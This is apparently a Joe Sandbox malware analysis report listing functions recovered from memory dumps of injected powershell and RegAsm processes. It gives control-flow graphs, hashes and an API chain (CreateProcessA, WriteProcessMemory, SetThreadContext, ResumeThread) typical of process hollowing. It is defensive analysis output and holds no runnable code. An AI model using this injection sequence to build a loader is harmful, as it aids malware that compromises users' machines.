                                                                                                control_flow_graph 324 8b69f8-8b6a8d 326 8b6a8f-8b6a99 324->326 327 8b6ac6-8b6ae6 324->327 326->327 328 8b6a9b-8b6a9d 326->328 332 8b6ae8-8b6af2 327->332 333 8b6b1f-8b6b4e 327->333 329 8b6a9f-8b6aa9 328->329 330 8b6ac0-8b6ac3 328->330 334 8b6aab 329->334 335 8b6aad-8b6abc 329->335 330->327 332->333 336 8b6af4-8b6af6 332->336 343 8b6b50-8b6b5a 333->343 344 8b6b87-8b6c41 CreateProcessA 333->344 334->335 335->335 337 8b6abe 335->337 338 8b6b19-8b6b1c 336->338 339 8b6af8-8b6b02 336->339 337->330 338->333 341 8b6b06-8b6b15 339->341 342 8b6b04 339->342 341->341 345 8b6b17 341->345 342->341 343->344 346 8b6b5c-8b6b5e 343->346 355 8b6c4a-8b6cd0 344->355 356 8b6c43-8b6c49 344->356 345->338 348 8b6b81-8b6b84 346->348 349 8b6b60-8b6b6a 346->349 348->344 350 8b6b6e-8b6b7d 349->350 351 8b6b6c 349->351 350->350 353 8b6b7f 350->353 351->350 353->348 366 8b6cd2-8b6cd6 355->366 367 8b6ce0-8b6ce4 355->367 356->355 366->367 368 8b6cd8-8b6cdb call 8b0444 366->368 369 8b6ce6-8b6cea 367->369 370 8b6cf4-8b6cf8 367->370 368->367 369->370 371 8b6cec-8b6cef call 8b0444 369->371 372 8b6cfa-8b6cfe 370->372 373 8b6d08-8b6d0c 370->373 371->370 372->373 376 8b6d00-8b6d03 call 8b0444 372->376 377 8b6d1e-8b6d25 373->377 378 8b6d0e-8b6d14 373->378 376->373 380 8b6d3c 377->380 381 8b6d27-8b6d36 377->381 378->377 383 8b6d3d 380->383 381->380 383->383
                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 008B6C2E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1833885028.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_8b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: acf6cf53f1eda8778df76508b1cdc8fd77151dc06ff79a1e4dd698a4bf6bacc5
                                                                                                • Instruction ID: aa0f94fbcf3294c0c6a37b5a50a76d9ab8f80385e2333d364462c2e91651c8f0
                                                                                                • Opcode Fuzzy Hash: acf6cf53f1eda8778df76508b1cdc8fd77151dc06ff79a1e4dd698a4bf6bacc5
                                                                                                • Instruction Fuzzy Hash: 6B913671D002199FDB10DF68C841BEEBBB2FB48314F1485A9E849E7250EB789995CF92
                                                                                                Function 008B6768 Relevance: 1.6, APIs: 1, Instructions: 77injectionCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 384 8b6768-8b676d 385 8b676f-8b67be 384->385 386 8b6736 call 8b673b 384->386 390 8b67ce-8b67d7 385->390 391 8b67c0-8b67cc 385->391 386->384 392 8b67de-8b680d WriteProcessMemory 390->392 391->390 393 8b680f-8b6815 392->393 394 8b6816-8b6846 392->394 393->394
                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 008B6800
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1833885028.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_8b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: b1838b81a474ab2e5a8144ff44e7f85a0ee3c908e55e57ee8b0235882da26523
                                                                                                • Instruction ID: 17a508f77957de885de76084bc768c2005504fc91b1bffe374e5fa03c7e8c395
                                                                                                • Opcode Fuzzy Hash: b1838b81a474ab2e5a8144ff44e7f85a0ee3c908e55e57ee8b0235882da26523
                                                                                                • Instruction Fuzzy Hash: C92168B69003499FCB10DFA9C881BDEBBF4FF48324F108429E559A7341DB789954CBA4
                                                                                                Function 008B6770 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 398 8b6770-8b67be 400 8b67ce-8b680d WriteProcessMemory 398->400 401 8b67c0-8b67cc 398->401 403 8b680f-8b6815 400->403 404 8b6816-8b6846 400->404 401->400 403->404
                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 008B6800
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1833885028.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_8b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: 34a281ab2c6b748919181bb8e115c2d32eccede17e5d49899e8989a7116f5548
                                                                                                • Instruction ID: b9e97a2655e3955eaf1c8bfb9b9faba95e7604dad4649b5e8510d926324d1c6c
                                                                                                • Opcode Fuzzy Hash: 34a281ab2c6b748919181bb8e115c2d32eccede17e5d49899e8989a7116f5548
                                                                                                • Instruction Fuzzy Hash: 192166B19003099FCB10DFA9C881BDEBBF4FF48320F10842AE958A7350D7789954CBA4
                                                                                                Function 008B65D1 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 408 8b65d1-8b6623 410 8b6633-8b6663 Wow64SetThreadContext 408->410 411 8b6625-8b6631 408->411 413 8b666c-8b669c 410->413 414 8b6665-8b666b 410->414 411->410 414->413
                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 008B6656
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1833885028.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_8b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: ac37b1b9b150716ba2173eb9e5ebe7a8b83ecf9b7dfad4eb956d0a4df85109fb
                                                                                                • Instruction ID: d746e735488d9da96b6a3734de4fc88afd68822e2c703228896658779e0e1ee1
                                                                                                • Opcode Fuzzy Hash: ac37b1b9b150716ba2173eb9e5ebe7a8b83ecf9b7dfad4eb956d0a4df85109fb
                                                                                                • Instruction Fuzzy Hash: C72157B59002098FDB10DFA9C5857EEBBF4FF48320F10842AD459A7240D7789A85CFA4
                                                                                                Function 008B65D8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 418 8b65d8-8b6623 420 8b6633-8b6663 Wow64SetThreadContext 418->420 421 8b6625-8b6631 418->421 423 8b666c-8b669c 420->423 424 8b6665-8b666b 420->424 421->420 424->423
                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 008B6656
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1833885028.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_8b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: 11b84b46c76771bc692b67286afbc2f2f5dbba22f3a0b0bbeda322eb127f9c17
                                                                                                • Instruction ID: 608adae44c02043e1c8cc71d216c1bb70dedd031ea972cad4fb425a3607c6e32
                                                                                                • Opcode Fuzzy Hash: 11b84b46c76771bc692b67286afbc2f2f5dbba22f3a0b0bbeda322eb127f9c17
                                                                                                • Instruction Fuzzy Hash: AB2138B19002098FDB10DFAAC4857EEBBF4EF49324F148429D559A7240DB78A984CFA4
                                                                                                Function 008B6521 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 428 8b6521-8b6597 ResumeThread 431 8b6599-8b659f 428->431 432 8b65a0-8b65c5 428->432 431->432
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1833885028.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_8b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                • Opcode ID: 5adb85ba95ce3a443110e74d55f5a41d653981591c3cf82e981c351a73392260
                                                                                                • Instruction ID: e5db904731ac7af92543c7c76af3a7a67cb68802055c090431c12b6362603a48
                                                                                                • Opcode Fuzzy Hash: 5adb85ba95ce3a443110e74d55f5a41d653981591c3cf82e981c351a73392260
                                                                                                • Instruction Fuzzy Hash: 4B1158B59002488FDB20DFA9C5457DEFBF4EB48324F20881AC159A7254D738A644CFA4
                                                                                                Function 008B6528 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 436 8b6528-8b6597 ResumeThread 439 8b6599-8b659f 436->439 440 8b65a0-8b65c5 436->440 439->440
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1833885028.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_8b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                • Opcode ID: 4fc674271029c86b6820c9ed7e870b69aaa6427278b7e7b02d92e69d131ce3b2
                                                                                                • Instruction ID: 2d479a76f055014b6324f6bf0cc0b4b8f3f658dd23ef3f996fb65d667c528171
                                                                                                • Opcode Fuzzy Hash: 4fc674271029c86b6820c9ed7e870b69aaa6427278b7e7b02d92e69d131ce3b2
                                                                                                • Instruction Fuzzy Hash: FC1136B19002488FDB20DFAAC4457DEFBF4EB88324F248429D559A7254DB79A944CFA4
                                                                                                Function 06DC2583 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 444 6dc2583-6dc25c5 446 6dc2709-6dc2711 444->446 447 6dc25cb-6dc25d0 444->447 448 6dc25e8-6dc25f4 447->448 449 6dc25d2-6dc25d8 447->449 454 6dc25fa-6dc25fd 448->454 455 6dc26b6-6dc26c0 448->455 450 6dc25dc-6dc25e6 449->450 451 6dc25da 449->451 450->448 451->448 454->455 457 6dc2603-6dc260a 454->457 458 6dc26ce-6dc26d4 455->458 459 6dc26c2-6dc26cb 455->459 457->446 460 6dc2610-6dc2615 457->460 461 6dc26da-6dc26e6 458->461 462 6dc26d6-6dc26d8 458->462 464 6dc262d-6dc2631 460->464 465 6dc2617-6dc261d 460->465 463 6dc26e8-6dc2706 461->463 462->463 464->455 469 6dc2637-6dc2639 464->469 467 6dc261f 465->467 468 6dc2621-6dc262b 465->468 467->464 468->464 469->455 471 6dc263b 469->471 474 6dc2642-6dc2644 471->474 475 6dc265c-6dc26b3 474->475 476 6dc2646-6dc264c 474->476 477 6dc264e 476->477 478 6dc2650-6dc2652 476->478 477->475 478->475
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1928352238.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_6dc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q
                                                                                                • API String ID: 0-1614139903
                                                                                                • Opcode ID: 7827c6e3bbdd8eb3bc4019e58fe30265d68261de210ad463cc5e7e6c08868c89
                                                                                                • Instruction ID: ab7a095dab9b99c69618543c50f71e2ead887052f7e2ab5d6ac83aef3a88b51f
                                                                                                • Opcode Fuzzy Hash: 7827c6e3bbdd8eb3bc4019e58fe30265d68261de210ad463cc5e7e6c08868c89
                                                                                                • Instruction Fuzzy Hash: 15216A70E5560ADFCBA5CF65C944A66BBF1BB45320F1980AEC4048B122D734DA45CBE2
                                                                                                Function 0061D006 Relevance: .0, Instructions: 45COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1829152667.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_61d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bea69d949e6c50c0c885a6c193022bb8cf714609258579c2a67b04e7eec11061
                                                                                                • Instruction ID: abb2bd90a0f11c9febd5919fa3ffd5af19ca89a9bf5ae97824dacaefb6bd8b90
                                                                                                • Opcode Fuzzy Hash: bea69d949e6c50c0c885a6c193022bb8cf714609258579c2a67b04e7eec11061
                                                                                                • Instruction Fuzzy Hash: 8601406140E3C05ED7128B258894792BFB4DF57225F1DC0DBD9888F2A7C2695849C772
                                                                                                Function 0061D01D Relevance: .0, Instructions: 45COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1829152667.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_61d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9dd4bf0fe0821107feb4f63d0f6d91f9c25ac24a77b7e9d069c2d963aa3cee5d
                                                                                                • Instruction ID: 0fcd012a91f4e8f040c33b1704265d8a9db3ac44468d842bff33085d1ca3ec0a
                                                                                                • Opcode Fuzzy Hash: 9dd4bf0fe0821107feb4f63d0f6d91f9c25ac24a77b7e9d069c2d963aa3cee5d
                                                                                                • Instruction Fuzzy Hash: F001F231408340AAE7108E2AC9C4BE7BF98EF49325F1CC46AED480A246C27998C2C6B1

                                                                                                Non-executed Functions

                                                                                                Function 06DC0220 Relevance: 6.4, Strings: 5, Instructions: 121COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1928352238.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_6dc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-3272787073
                                                                                                • Opcode ID: 53f2350156a67c3c036cb65f001476dfe3568e1dcd02c73ae00964853cc72113
                                                                                                • Instruction ID: 36eaf2975598c6fbe4bf6403736e0aa707c361c379be35dcc13393208bda792e
                                                                                                • Opcode Fuzzy Hash: 53f2350156a67c3c036cb65f001476dfe3568e1dcd02c73ae00964853cc72113
                                                                                                • Instruction Fuzzy Hash: 7A41D031F0020ECFDBA88FA9D554A6AB7F1BB84230F10857ED4558B215EB33C885CB91
                                                                                                Function 06DC110B Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1928352238.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_6dc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                • API String ID: 0-2049395529
                                                                                                • Opcode ID: 35d682ffd1ca3f37750073389c7e97a583e138b0ec5149215686881a9350fc28
                                                                                                • Instruction ID: ff1bff7491958a263f0a221f15459da0fa8d86967eb3558dd36127319b0878e3
                                                                                                • Opcode Fuzzy Hash: 35d682ffd1ca3f37750073389c7e97a583e138b0ec5149215686881a9350fc28
                                                                                                • Instruction Fuzzy Hash: CA017120B4E39A4FD36B1B681C201156FF69F93560729459FC081DF3A7CE5A8D4A83A6

                                                                                                Non-executed Functions

                                                                                                Function 01443EB4 Relevance: .1, Instructions: 147COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002B.00000002.2108864225.0000000001439000.00000004.00000020.00020000.00000000.sdmp, Offset: 01439000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_43_2_1439000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b991acb19f42640ddd8c42c6ce556beb547adb66cdb811e52f558d01a0f7852b
                                                                                                • Instruction ID: 0982e6bff08310c25fa1ed662f1c59d8a7d45df0e1aeae01362462e5887a0708
                                                                                                • Opcode Fuzzy Hash: b991acb19f42640ddd8c42c6ce556beb547adb66cdb811e52f558d01a0f7852b
                                                                                                • Instruction Fuzzy Hash: 0851D07145E3D28FC3038F388869695BFB0EF0321472945DED0C08F1A3E729955ACB96

                                                                                                Executed Functions

                                                                                                Function 00408600 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 351threadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00408624
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0040862E
                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087FA
                                                                                                • GetForegroundWindow.USER32 ref: 00408974
                                                                                                  • Part of subcall function 0040B7B0: FreeLibrary.KERNEL32(00408A31), ref: 0040B7B6
                                                                                                  • Part of subcall function 0040B7B0: FreeLibrary.KERNEL32 ref: 0040B7D7
                                                                                                • ExitProcess.KERNEL32 ref: 00408A4A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                • String ID: b]u)$}$}
                                                                                                • API String ID: 3676751680-2900034282
                                                                                                • Opcode ID: 6a07f0384f71d87041b62ad58867324155b1be50ba3e74cb306905e4ea8226d7
                                                                                                • Instruction ID: 3bf81113ce60e3950654fa87f9b5bc85db09618474996d7b9c4e13ef7b0d228f
                                                                                                • Opcode Fuzzy Hash: 6a07f0384f71d87041b62ad58867324155b1be50ba3e74cb306905e4ea8226d7
                                                                                                • Instruction Fuzzy Hash: C4C1E673E187144BC708DF69C84125AF7D6ABC8710F0AC53EA898EB391EA74DD048BC6
                                                                                                Function 0043E110 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 88 43e110-43e142 LdrInitializeThunk
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(0044148A,?,00000018,?,?,00000018,?,?,?), ref: 0043E13E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                Function 00408A50 Relevance: .1, Instructions: 90COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
                                                                                                • Instruction ID: c6ef65a4040eb9722264cce64ace65176086622d4161082164e2e1e487573ca7
                                                                                                • Opcode Fuzzy Hash: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
                                                                                                • Instruction Fuzzy Hash: E121C837A62B184BD3108E54DCC87917761E7D9318F3E86B8C9249F7D2C97BA91386C0
                                                                                                Function 00409D1E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 31 409d1e-409d34 32 409d40-409d52 31->32 32->32 33 409d54-409d7e 32->33 34 409d80-409d92 33->34 34->34 35 409d94-409e13 LoadLibraryExW call 43d960 34->35 38 409e20-409e32 35->38 38->38 39 409e34-409e5e 38->39 40 409e60-409e72 39->40 40->40 41 409e74-409e80 LoadLibraryExW call 43d960 40->41 43 409e85-409e98 41->43
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(?,00000000), ref: 00409D98
                                                                                                • LoadLibraryExW.KERNEL32(?,00000000), ref: 00409E78
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID: CKI
                                                                                                • API String ID: 1029625771-2433779057
                                                                                                • Opcode ID: 46ebf1f11a428727df2c69ed2ddcf1f0c4f78635cb5cf24ba122c25d2125fb43
                                                                                                • Instruction ID: 9df50abc4230604fad3af689b86cbcfc4f62151ff32a39ed9a717dc759385280
                                                                                                • Opcode Fuzzy Hash: 46ebf1f11a428727df2c69ed2ddcf1f0c4f78635cb5cf24ba122c25d2125fb43
                                                                                                • Instruction Fuzzy Hash: 1041EFB4D003009FEB149F789992A9A7F71EB06324F5152ADD4902F3E6C635981A8BE6
                                                                                                Function 0043E34B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 48 43e34b-43e357 49 43e360-43e37a 48->49 49->49 50 43e37c-43e409 GetForegroundWindow call 4402f0 49->50
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32 ref: 0043E3BA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: ForegroundWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2020703349-3019521637
                                                                                                • Opcode ID: 1a0742d174ed02cdc22a72f35ed7972a2a7288d22f9a72e178f62dae787fe3a6
                                                                                                • Instruction ID: 528e16a96f9d9f00b26d3e5e14e5fe829b229e0aa49aafaba4eb36a7b6cd6e75
                                                                                                • Opcode Fuzzy Hash: 1a0742d174ed02cdc22a72f35ed7972a2a7288d22f9a72e178f62dae787fe3a6
                                                                                                • Instruction Fuzzy Hash: FA112B7AE418614BEF08CF39DC171AA77A2B3C5325B2D56B98816E32D0DA3C5C068A84
                                                                                                Function 0040EF53 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 54 40ef53-40f0b5 CoInitializeEx * 2
                                                                                                APIs
                                                                                                • CoInitializeEx.OLE32(00000000,00000002), ref: 0040EF57
                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040F09C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID:
                                                                                                • API String ID: 2538663250-0
                                                                                                • Opcode ID: c72aef12464a92cc2c3f2d51aa4abadf574ffcca3a61543972ef4f2091f679da
                                                                                                • Instruction ID: f51fb2f77ad80b64b0419191bf69b8e44a6001040ca864f0c8a1fa7d7adef59f
                                                                                                • Opcode Fuzzy Hash: c72aef12464a92cc2c3f2d51aa4abadf574ffcca3a61543972ef4f2091f679da
                                                                                                • Instruction Fuzzy Hash: 9341C6B4C10B40AFD370EF399A0B7137EB8AB05250F504B1DF9E6866D4E231A4198BD7
                                                                                                Function 0040EC77 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 55 40ec77-40ecbb CoInitializeSecurity * 2
                                                                                                APIs
                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040EC89
                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040ECA2
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeSecurity
                                                                                                • String ID:
                                                                                                • API String ID: 640775948-0
                                                                                                • Opcode ID: fb62f50cd5accdd3f8c0e7536e39a1f07535dd0835aa916c8da64f7b89d0cef8
                                                                                                • Instruction ID: 738adb6083984dd8bacecb44fa1de3dd99d04845307cbd3813f349a55eb87af8
                                                                                                • Opcode Fuzzy Hash: fb62f50cd5accdd3f8c0e7536e39a1f07535dd0835aa916c8da64f7b89d0cef8
                                                                                                • Instruction Fuzzy Hash: 8BE042783D97417BF6795B14ED57F143225AB86F26F304314B7253D6E58AE03201451D
                                                                                                Function 0043E3A9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 79 43e3a9-43e3c4 GetForegroundWindow call 4402f0 82 43e3c9-43e409 79->82
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32 ref: 0043E3BA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: ForegroundWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2020703349-0
                                                                                                • Opcode ID: 0e9d24a3901733470457e1249cc7f7470b5df7d452cc394c81079ce9d69cb8f4
                                                                                                • Instruction ID: 5efd1ee9a03ea3c3eb0c12d762aaad34ed982eea5bb01117e5cc31371429f0ae
                                                                                                • Opcode Fuzzy Hash: 0e9d24a3901733470457e1249cc7f7470b5df7d452cc394c81079ce9d69cb8f4
